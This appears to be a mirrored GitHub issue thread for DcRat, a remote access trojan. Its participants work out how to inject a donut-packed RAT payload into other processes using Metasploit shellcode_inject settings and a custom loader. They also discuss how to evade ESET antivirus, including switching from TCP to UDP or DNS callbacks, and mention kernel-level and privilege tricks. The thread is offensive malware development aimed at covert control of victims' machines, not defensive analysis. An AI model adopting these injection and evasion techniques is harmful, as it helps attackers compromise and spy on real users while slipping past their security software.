Comments (20)
I've tried donut,the problem maybe caused by the unsafe code.
https://github.com/qwqdanchun/DcRat/blob/main/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/UnsafeCodecs/UnsafeStreamCodec.cs
you will find some native code in remotedesktop.dll
from dcrat.
maybe look at this project
https://github.com/qwqdanchun/Bypass
it shows how to code a loader to bypass av
change the way of encryption, and enjoy it.
from dcrat.
Unsafe code -> It is impossible to convert to safe code?
Can't fix it in UnsafeStreamCodec.cs?
The fileless technique I tested is
Compile it to a donut and run the command below
metasploit command
use post/windows/manage/shellcode_inject
set AUTOUNHOOK false
set CHANNELIZED false
set INTERACTIVE false
set pid 0
set shellcode /root/payload.bin
set session 1(number)
run
from dcrat.
In the case of a quasar remote, view the screen possible
There seems to be something different
from dcrat.
Sorry for what i say before.
I make a payload.bin with donut ,and test with a c# loader and a c++ loader just now.
both work well.So it may not because of the unsafe code.
Don't have msf on my pc, can't test the shellcode_inject module.
Have you ever tried any shellcode loader?
from dcrat.
You don't have to use Metasploit
You can also create thread after copying the donut compressed program to memory
Something that can be said for sure
quasar remote is view possible
I have no idea how to solve this problem
Thanks for the help
from dcrat.
pid 0 runs notepad.exe -> new notepad process memory injection
You can also specify the pid
from dcrat.
try to change the pid.
I find that this artical says"在注入进程时,发现注入到notepad.exe中无法执行,但注入到powershell中可以执行。"
translated:"When the process is injected, it is found that injection into Notepad cannot be executed, but injection into PowerShell can be executed."
https://www.freebuf.com/articles/system/234365.html
from dcrat.
Process does not matter if the window session is the same process
explorer.exe,RuntimeBroker.exe,notepad.exe etc.. -> all impossible
Remote viewing of Quasar is possible
In UnsafeStreamCodec.cs, Quasar has several different parts.
I don't know why this is not possible from anync remote
from dcrat.
try powershell,maybe because of the clr ?
from dcrat.
can't find why it doesn't work
from dcrat.
Quasar source works fine
This is the source with try and some additions
The screen is now displayed normally
############################################################
https://www.eset.com/us/home/free-trial/
eset antivirus msil/agent detect
eset detects unconditionally when connecting tcp socket
Do you know how to bypass eset tcp?
Screen output problem was solved lol
ClientSocket.cs
foreach (IPAddress theaddress in addresslist)
{
try
{
TcpClient.Connect(theaddress, ServerPort); // tcp connect eset anti virus detect
if (TcpClient.Connected) break;
}
catch { }
}
from dcrat.
Thank you for your code.
I'll push it later.
If you'd like to bypass tcp detect, may change it to udp or dns and so on
After install eset in VM. I test the rat. It didn't detect tcp when connect. Don't know why.
However,sad to find many plugin may be detect.
Maybe i should rewrite some plugin later.
from dcrat.
not detected as exe execution
Memory area detection
-
Copy the donut-packed memory and create thread
-
Connect tcp in the created thread
-
detect memory tcp connect
Normal exe execution is not detected
Fileless technique bypasses 90% of antivirus
I am curious if there is any new detection technique
thank you
#############################################
Thanks for any hints on the screen viewing problem(unsafe code memory)
I don't know how to bypass eset
from dcrat.
eset's scan is powerful.
maybe it disable tcp connect from process like notepad?
this is my guess
from dcrat.
For it didn't detect tcp connect when you just run it as exe
from dcrat.
https://github.com/BlackINT3/OpenArk/releases/tag/v1.1.0
Obregistercallbacks in kernel
If you disable the loadimage kernel part to work with openark
Can't be detected
It seems to be detected if the running thread image address is not normal
Create thread and detect if the image address value is abnormal!
from dcrat.
Good work!
However this is hard to bypass
from dcrat.
usually you can't disable it in ring3
from dcrat.
eset is like a good antivirus
If you load the drive with ring 0 it will probably be bypassed easily
From the general computer to the system privilege, you must also increase privileges and manipulate tokens
ring3 seems to need an idea
Thanks for the reply
from dcrat.
Related Issues (20)
- Fake binding?
- 解密密码? HOT 2
- ip by link HOT 3
- 可以有更多的shellcode种类吗? HOT 2
- Add function HIDE VNC HOT 1
- . HOT 1
- Release please last code cant relaese give errors
- Hiding my ip HOT 1
- starting HOT 3
- Ransomware HOT 3
- Keylogger
- i cant get a connection HOT 1
- How to connect
- Linux support? HOT 1
- I cant get a connection HOT 11
- Ransomware access denied HOT 10
- Question. HOT 3
- Question HOT 1
- Building HOT 2
- Remote Desktop after Shell Injection HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from dcrat.